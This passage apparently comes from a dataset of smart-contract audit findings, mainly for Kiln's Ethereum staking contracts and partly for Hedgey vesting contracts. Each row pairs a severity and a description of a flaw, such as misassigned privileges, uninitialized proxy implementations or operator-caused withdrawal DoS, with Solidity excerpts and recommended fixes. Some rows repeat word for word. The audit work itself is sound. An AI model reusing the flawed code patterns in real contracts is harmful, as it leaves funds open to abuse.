external view returns (bool);\\n\\n function toggleWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external;\\n}\\n```\\n\\n```\\ninterface IFeeRecipient {\\n function init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external;\\n\\n function withdraw() external;\\n}\\n```\\n",Inherit from interface.,,```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n +Misleading Error Statements,low,"The contracts define custom 
errors to revert transactions on failed operations or invalid input, however, they convey little to no information, making it difficult for the off-chain monitoring tools to track relevant updates.\\n```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n\\nFor instance, the `init` modifier is used to initialize the contracts with the current Version. The Version initialization ensures that the provided version must be an increment of the previous version, if not, it reverts with an error as `AlreadyInitialized()`. However, the error doesn't convey an appropriate message correctly, as any version other than the expected version will signify that the version has already been initialized.\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != StakingContractStorageLib.getVersion() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n","Use a more meaningful statement with enough information to track off-chain for all the custom errors in every contract in scope. 
For instance, add the current and supplied versions as indexed parameters, like: IncorrectVersionInitialization(current version, supplied version);\\nAlso, the function can be simplified as\\n```\\n function initELD(address \\_stakingContract) external init(VERSION\\_SLOT.getUint256() + 1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n }\\n```\\n",,"```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n" +Incorrect Priviliges setOperatorAddresses Acknowledged,high,"The function `setOperatorAddresses` instead of allowing the Operator to update its own, as well as the Fee Recipient address, incorrectly provides the privileges to the Fee Recipient. As a result, the Fee Recipient can modify the operator address as and when needed, to DoS the operator and exploit the system. 
Additionally, upon reviewing the documentation, we found that there are no administrative rights defined for the Fee Recipient, hence highlighting the incorrect privilege allocation.\\n```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n","The modifier should be `onlyActiveOperatorOrAdmin` allowing only the operator itself or admin of the system, to update the necessary addresses.\\nAlso, for transferring crucial privileges from one address to another, the operator's address should follow a 2-step approach like transferring ownership.",,"```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n" +Unconstrained Snapshot While Setting Operator Limit,medium,"Function `setOperatorLimit` as the name says, allows the `SYS_ADMIN` to set/update the staking limit for an operator. 
The function ensures that if the limit is being increased, the `_snapshot` must be ahead of the last validator edit(block.number at which the last validator edit occurred). However, the parameter `_snapshot` is unconstrained and can be any number. Also, the functions `addValidators` and `removeValidators` update the `block.number` signifying the last validator edit, but never constrain the new edits with it. Since there are no publicly available functions to access this value, makes the functionality even more confusing and may be unnecessary.\\n```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n","If the functionality is not needed, consider removing it. Otherwise, add some necessary logic to either constrain the last validator edit or add public functions for the users to access it.",,```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n +Hardcoded Operator Limit Logic,medium,"The contract defines some hardcoded limits which is not the right approach for upgradeable contracts and opens doors for accidental mistakes, if not handled with care.\\nThe operators for the current version are limited to 1. 
If the auditee team decides to open the system to work with more operators but fails to change the limit while upgrading, the upgraded contract will have no effect, and will still disallow any more operators to be added.\\n```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n\\nAlso, the function `_depositOnOneOperator` hardcodes the operator Index as 0 since the contract only supports one operator.\\n```\\nfunction \\_depositOnOneOperator(uint256 \\_depositCount, uint256 \\_totalAvailableValidators) internal {\\n StakingContractStorageLib.setTotalAvailableValidators(\\_totalAvailableValidators - \\_depositCount);\\n \\_depositValidatorsOfOperator(0, \\_depositCount);\\n}\\n```\\n","A better approach could be to constrain the limit of operators that can be added with a storage variable or constant, provided at the time of contract initialization. The contract should also consider supporting dynamic operator deposits for future versions instead of the default hardcoded index.",,"```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n" +StakingContract - PubKey Length Checks Not Always Enforced,medium,"`addValidators` checks that the provided `bytes pubKey` is a multiple of the expected pubkey length while functions like `setWithdrawer` do not enforce similar length checks. 
This is an inconsistency that should be avoided.\\n`addValidators` enforcing input length checks\\n```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n\\n`setWithdrawer` accepting any length for a `pubKey`. Note that `_getPubKeyRoot` will take any input provided and concat it with the zero bytes.\\n```\\n/// @notice Set withdrawer for public key\\n/// @dev Only callable by current public key withdrawer\\n/// @param \\_publicKey Public key to change withdrawer\\n/// @param \\_newWithdrawer New withdrawer address\\nfunction setWithdrawer(bytes calldata \\_publicKey, address \\_newWithdrawer) external {\\n if (!StakingContractStorageLib.getWithdrawerCustomizationEnabled()) {\\n revert Forbidden();\\n }\\n \\_checkAddress(\\_newWithdrawer);\\n bytes32 pubkeyRoot = \\_getPubKeyRoot(\\_publicKey);\\n StakingContractStorageLib.WithdrawersSlot storage withdrawers = StakingContractStorageLib.getWithdrawers();\\n\\n if (withdrawers.value[pubkeyRoot] != msg.sender) {\\n revert Unauthorized();\\n }\\n\\n emit ChangedWithdrawer(\\_publicKey, \\_newWithdrawer);\\n\\n withdrawers.value[pubkeyRoot] = \\_newWithdrawer;\\n}\\n```\\n\\n```\\nfunction \\_getPubKeyRoot(bytes memory \\_publicKey) internal pure returns (bytes32) {\\n return sha256(abi.encodePacked(\\_publicKey, bytes16(0)));\\n}\\n```\\n\\nSimilarly, the withdraw family of functions does not enforce a pubkey length either. 
However, it is unlikely that someone finds a pubkey that matches a root for the attacker's address.\\n```\\n/// @notice Withdraw the Execution Layer Fee for a given validator public key\\n/// @dev Funds are sent to the withdrawer account\\n/// @param \\_publicKey Validator to withdraw Execution Layer Fees from\\nfunction withdrawELFee(bytes calldata \\_publicKey) external {\\n \\_onlyWithdrawerOrAdmin(\\_publicKey);\\n \\_deployAndWithdraw(\\_publicKey, EXECUTION\\_LAYER\\_SALT\\_PREFIX, StakingContractStorageLib.getELDispatcher());\\n}\\n```\\n\\nNevertheless, the methods should be hardened so as not to give a malicious actor the freedom to use an unexpected input size for the `pubKey` argument.","Enforce pubkey length checks when accepting a single pubkey as bytes similar to the batch functions that check for a multiple of `PUBLIC_KEY_LENGTH`. Alternatively, declare the function argument as `bytes48` (however, in this case inputs may be auto-padded to fit the expected length, potentially covering situations that otherwise would throw an error)",,"```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n" +Unpredictable Behavior Due to Admin Front Running or General Bad Timing,medium,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. 
This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nSome instances of this are more important than others, but in general, users of the system should have assurances about the behavior of the action they're about to take.\\nUpgradeable TU proxy\\nFee changes take effect immediately\\n```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n\\n```\\n/// @notice Change the Global fee\\n/// @param \\_globalFee Fee in Basis Point\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. 
The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.",,```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n +Potentially Uninitialized Implementations,medium,"Most contracts in the system are meant to be used with a proxy pattern. First, the implementations are deployed, and then proxies are deployed that delegatecall into the respective implementations following an initialization call (hardhat, with same transaction). However, the implementations are neither initialized explicitly nor protected from other actors claiming/initializing them. This allows anyone to call initialization functions on implementations for use with phishing attacks (i.e. contract implementation addresses are typically listed on the official project website as valid contracts) which may affect the reputation of the system.\\nNone of the implementations allow unprotected delegatecalls or selfdestructs, 
lowering the severity of this finding.\\n```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n\\n```\\n/// @notice Initializes the receiver\\n/// @param \\_dispatcher Address that will handle the fee dispatching\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n stakingContract = msg.sender; // The staking contract always calls init\\n}\\n```\\n\\n```\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n}\\n```\\n",Petrify contracts in the constructor and disallow other actors from claiming/initializing the implementations.,,"```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n" +Operator May DoS the Withdrawal or Make It More Expensive,medium,"While collecting fees, the operator may:\\ncause DoS for the funds/rewards withdrawal by reverting the call, thus reverting the whole transaction. 
By doing this, it won't be receiving any rewards, but neither will the treasury or the withdrawer.\\nmake the withdrawal more expensive by sending a huge chunk of `returndata`. As the `returndata` is copied into memory in the caller's context, it will add an extra gas overhead for the withdrawer, making it more expensive.\\nor mint gas token\\n```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}("""");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n","A possible solution could be to make a low-level call in an inline assembly block, restricting the `returndata` to a couple of bytes, and instead of reverting on the failed call, emit an event, flagging the call that failed.",,"```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}("""");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n" +ConsensusLayerFeeDispatcher/ExecutionLayerFeeDispatcher - Should Hardcode autoPetrify With Highest Initializable Version Instead of User Provided Argument,low,"The version to auto-initialize is not hardcoded with the constructor. 
On deployment, the deployer may accidentally use the wrong version, allowing anyone to call `initialize` on the contract.\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n\\n/// @notice Initialize the contract by storing the staking contract and the public key in storage\\n/// @param \\_stakingContract Address of the Staking Contract\\nfunction initELD(address \\_stakingContract) external init(1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n}\\n```\\n","Similar to the `init(1)` modifier, it is suggested to track the highest version as a `const int` with the contract and auto-initialize to the highest version in the constructor instead of taking the highest version as a deployment argument.",,```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n +StakingContract - Misleading Comment,low,The comment notes that the expected caller is `admin` while the modifier checks that `msg.sender` is an active operator.\\n```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n,Rectify the comment to accurately describe the intention of the method/modifier.,,```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n +Impractical Checks for Global/Operator Fees and the Commission Limits,low,"The contract initialization 
sets up the global and operator fees and also their commission limits. However, the checks just make sure that the fees or commission limit is up to 100% which is not a very practical check. Any unusual value, for instance, if set to 100% will mean the whole rewards/funds will be non-exempted and taxed as global fees, which we believe will never be a case practically.\\n```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n\\n```\\nfunction initialize\\_2(uint256 globalCommissionLimitBPS, uint256 operatorCommissionLimitBPS) public init(2) {\\n if (globalCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalCommissionLimit(globalCommissionLimitBPS);\\n if (operatorCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorCommissionLimit(operatorCommissionLimitBPS);\\n}\\n```\\n\\n```\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n\\n```\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n","The fees should be checked with a more practical limit. 
For instance, checking against a min - max limit, like 20% - 40%.",,```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n +Contracts Should Inherit From Their Interfaces,low,"The following contracts should enforce correct interface implementation by inheriting from the interface declarations.\\n```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n\\n```\\ninterface IStakingContractFeeDetails {\\n function getWithdrawerFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (address);\\n\\n function getTreasury() external view returns (address);\\n\\n function getOperatorFeeRecipient(bytes32 pubKeyRoot) external view returns (address);\\n\\n function getGlobalFee() external view returns (uint256);\\n\\n function getOperatorFee() external view returns (uint256);\\n\\n function getExitRequestedFromRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function getWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function toggleWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external;\\n}\\n```\\n\\n```\\ninterface IFeeRecipient {\\n function init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external;\\n\\n function withdraw() external;\\n}\\n```\\n",Inherit from interface.,,```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n +Misleading Error Statements,low,"The contracts define custom 
errors to revert transactions on failed operations or invalid input, however, they convey little to no information, making it difficult for the off-chain monitoring tools to track relevant updates.\\n```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n\\nFor instance, the `init` modifier is used to initialize the contracts with the current Version. The Version initialization ensures that the provided version must be an increment of the previous version, if not, it reverts with an error as `AlreadyInitialized()`. However, the error doesn't convey an appropriate message correctly, as any version other than the expected version will signify that the version has already been initialized.\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != StakingContractStorageLib.getVersion() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n","Use a more meaningful statement with enough information to track off-chain for all the custom errors in every contract in scope. 
For instance, add the current and supplied versions as indexed parameters, like: IncorrectVersionInitialization(current version, supplied version);\\nAlso, the function can be simplified as\\n```\\n function initELD(address \\_stakingContract) external init(VERSION\\_SLOT.getUint256() + 1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n }\\n```\\n",,"```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n" +Architectural Pattern of Internal and External Functions Increases Attack Surface,low,"There is an architectural pattern throughout the code of functions being defined in two places: an external wrapper (name) that verifies authorization and validates parameters, and an internal function (_name) that contains the implementation logic. 
This pattern separates concerns and avoids redundancy in the case that more than one external function reuses the same internal logic.\\nFor example, `VotingTokenLockupPlans.setupVoting` calls an internal function `_setupVoting` and sets the `holder` parameter to `msg.sender`.\\n```\\nfunction setupVoting(uint256 planId) external nonReentrant returns (address votingVault) {\\n votingVault = \\_setupVoting(msg.sender, planId);\\n```\\n\\n```\\nfunction \\_setupVoting(address holder, uint256 planId) internal returns (address) {\\n require(ownerOf(planId) == holder, '!owner');\\n```\\n\\nIn this case, however, there is no case in which `holder` should not be set to `msg.sender`. Because the internal function doesn't enforce this, it's theoretically possible that if another internal (or derived) function were compromised then it could call `_setupVoting` with `holder` set to `ownerOf(planId)`, even if `msg.sender` isn't the owner. This increases the attack surface through providing unneeded flexibility.\\nOther Examples\\n```\\nfunction segmentPlan(\\n uint256 planId,\\n uint256[] memory segmentAmounts\\n) external nonReentrant returns (uint256[] memory newPlanIds) {\\n newPlanIds = new uint256[](segmentAmounts.length);\\n for (uint256 i; i < segmentAmounts.length; i++) {\\n uint256 newPlanId = \\_segmentPlan(msg.sender, planId, segmentAmounts[i]);\\n```\\n\\n```\\nfunction \\_segmentPlan(address holder, uint256 planId, uint256 segmentAmount) internal returns (uint256 newPlanId) {\\n require(ownerOf(planId) == holder, '!owner');\\n```\\n\\n```\\nfunction revokePlans(uint256[] memory planIds) external nonReentrant {\\n for (uint256 i; i < planIds.length; i++) {\\n \\_revokePlan(msg.sender, planIds[i]);\\n```\\n\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n```\\n","Resolution\\nFixed as of commit 
`f4299cdba5e863c9ca2d69a3a7dd554ac34af292`.\\nTo reduce the attack surface, consider hard coding parameters such as `holder` to `msg.sender` in internal functions when extra flexibility isn't needed.",,"```\\nfunction setupVoting(uint256 planId) external nonReentrant returns (address votingVault) {\\n votingVault = \\_setupVoting(msg.sender, planId);\\n```\\n" +Revoking Vesting Will Trigger a Taxable Event,low,"Resolution\\nFixed as of commit `f4299cdba5e863c9ca2d69a3a7dd554ac34af292`.\\nFrom the previous conversations with the Hedgey team, we identified that users should be in control of when taxable events happen. For that reason, one could redeem a plan in the past. Unfortunately, the recipient of the vesting plan can not always be in control of the redemption process. If for one reason or another the administrator of the vesting plan decides to revoke it, any vested funds will be sent to the vesting plan holder, triggering the taxable event and burning the NFT.\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n address 
vault = votingVaults[planId];\\n if (vault == address(0)) {\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n } else {\\n delete votingVaults[planId];\\n VotingVault(vault).withdrawTokens(vestingAdmin, remainder);\\n VotingVault(vault).withdrawTokens(holder, balance);\\n }\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n",One potential workaround is to only withdraw the unvested portion to the vesting admin while keeping the vested part in the contract. That being said `amount` and `rate` variables would need to be updated in order not to allow any additional vesting for the given plan. This way plan holders will not be entitled to more funds but will be able to redeem them at the time they choose.,,"```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n" +Use of selfdestruct Deprecated in VotingVault,low,"The `VotingVault.withdrawTokens` function invokes the `selfdestruct` operation when the vault is empty so that it can't be used again.\\nThe use ofselfdestruct has been deprecated and a breaking change in its future behavior is expected.\\n```\\nfunction withdrawTokens(address to, uint256 amount) external onlyController {\\n TransferHelper.withdrawTokens(token, to, amount);\\n if (IERC20(token).balanceOf(address(this)) == 0) selfdestruct;\\n}\\n```\\n",Remove the line that invokes `selfdestruct` and consider changing internal state 
